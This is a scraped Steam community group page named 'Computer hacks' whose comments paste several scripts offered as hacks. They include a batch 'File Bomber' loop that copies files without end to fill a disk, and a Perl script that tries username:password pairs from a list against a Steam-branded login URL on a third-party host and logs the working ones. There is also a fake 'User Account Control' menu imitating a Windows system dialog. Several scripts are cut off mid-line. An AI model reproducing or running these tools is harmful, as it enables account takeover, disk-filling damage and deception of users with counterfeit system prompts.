STEAM GROUP
Computer hacks CP
STEAM GROUP
Computer hacks CP
0
IN-GAME
1
ONLINE
Founded
28 March, 2010
ABOUT Computer hacks

No information given.
POPULAR DISCUSSIONS
VIEW ALL (6)
RECENT ANNOUNCEMENTS
10 Simple School Hacks
Home made virus "Shine"
13 Comments
26 Feb, 2012 @ 9:38am 
File Bomber

@echo off

cd %userprofile%/desktop/test

echo fail > target

:alpha

copy * %random%

goto alpha
10 Aug, 2010 @ 9:27am 
@echo off
goto a1
:error
cls
echo Option unavailable...
ping localhost -n 5 >nul
goto a1
:a1
cls
echo --------------------------------------------------------------------------------
echo Internet File Cleanup
echo --------------------------------------------------------------------------------
echo.
set /p name=To begin, type your username:
if %name%==%name% goto a
:a
cls
echo --------------------------------------------------------------------------------
echo Internet File Cleanup
echo --------------------------------------------------------------------------------
echo.
echo Select option:
echo ==============
echo.
echo 1) Delete Internet Cookies
echo 2) Delete Internet Temporary Files
echo 3) Exit
echo.
set /p op=Type 1/2/3:
if %op%==1 goto 1
if %op%==2 goto 2
if %op%==3 goto 3
goto error
:1
cls
echo --------------------------------------------------------------------------------
echo Internet File Cleanup
echo ---------------------------------------------------------------------
10 Aug, 2010 @ 9:25am 
@echo off
:1
start C:Progra~1Intern~1iexplore.exe
10 Aug, 2010 @ 9:24am 
@echo off
title User Account Control (UAC)
goto home
:error
cls
echo [User Accounts]
echo.
echo.
echo Option unavailable
echo.
echo Try typing "yes" or "no" without the quotes next time
echo.
pause
goto home
:home
cls
echo [User Accounts]
echo.
echo.
echo Select option:
echo =============
echo.
echo 1) Create a new account
echo 2) Delete an account
echo 3) view user accounts
echo 4) Change which accounts are active
echo 5) Change user account passwords
echo 6) Change Account type
echo 7) exit
echo.
set /p option=Type numeral option:
if %option%==1 goto 1
if %option%==2 goto 2
if %option%==3 goto 3
if %option%==4 goto 4
if %option%==5 goto 5
if %option%==6 goto 6
if %option%==7 goto 7
:1
cls
echo [User Accounts]
echo.
echo.
set /p name=Name the new account:
if %name%==%name% goto usertype
:usertype
cls
echo [User Accounts]
echo.
echo.
echo Select The account type for %name%:
echo (type H for help on these accounts)
echo ===================================
echo.
echo 1) Administrator
ec
10 Aug, 2010 @ 9:23am 
#!/usr/bin/perl
use HTTP::Cookies;
$myCookies = HTTP::Cookies->new();
use LWP::UserAgent;
my $ua = LWP::UserAgent->new;
$ua->cookie_jar($myCookies);
$ua->agent('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.4');
push @{$ua->requests_redirectable}, 'POST';

if(@ARGV!= 2){&usage;}
else{
my $loginlist = $ARGV[0];
my $resultlist = $ARGV[1];
open("xfile", $loginlist) || die "Couldn't open $loginlist\n";
while(my $line = <xfile>){
chomp($line);
my @details = split(/:/,$line);
if(($details[0]) && ($details[1])){
print "Checking $details[0] : $details[1]\t\t";
if(steam($details[0],$details[1])){print "Success\n";
open(LOG,">>$resultlist") || die "Couldn't open $resultlist\n";
print LOG "$details[0]:$details[1]\n";
close(LOG);
}else{print "Failure\n";}}}}

sub steam($$){
my $username = $_[0];
my $password = $_[1];
my $url = "https://v1.steam.hlxgame.cc/?action=doLogin&steamAccountName=$username&steamPassword=$password";
my $login = $ua->get($url)
10 Aug, 2010 @ 9:22am 
@echo off
color 0a
cls
set timer=0
set part1=1001010110101010101010101010101101010101001010110100101011010101010101010101010110101010101010101010101010010100100110101001010101010
set part2=0111010100110101010101010101010010100100110101001010101010011001101011000010100100101010010101111010110001111101010100101001010101011
set part3=1010110111010010100101010010101000101110101010110100101011010101010101010101010110101010101010101010101010010100100110101001010101010
set part4=1010110011101000101000101000101010100010011011011010100101001010010101110101010001010001010110101101001010101010000101101010101001110
set part5=0101010100110011010110000101001001010101011010001010101010011001101011000010100100101010010101111010110001111101010100101001010101011
set part6=0010101011001100010101101011010010101010100001011010101010011001101011000010100100101011101010101010101010010100100110101001010101010
set part7=110110100010001010100101101010101100101010101001010010101101010101010101010101011010101001
VIEW ALL (2)
GROUP MEMBERS
Administrators
Members
0
IN-GAME
1
ONLINE
0 IN CHAT
Enter chat room
Founded
28 March, 2010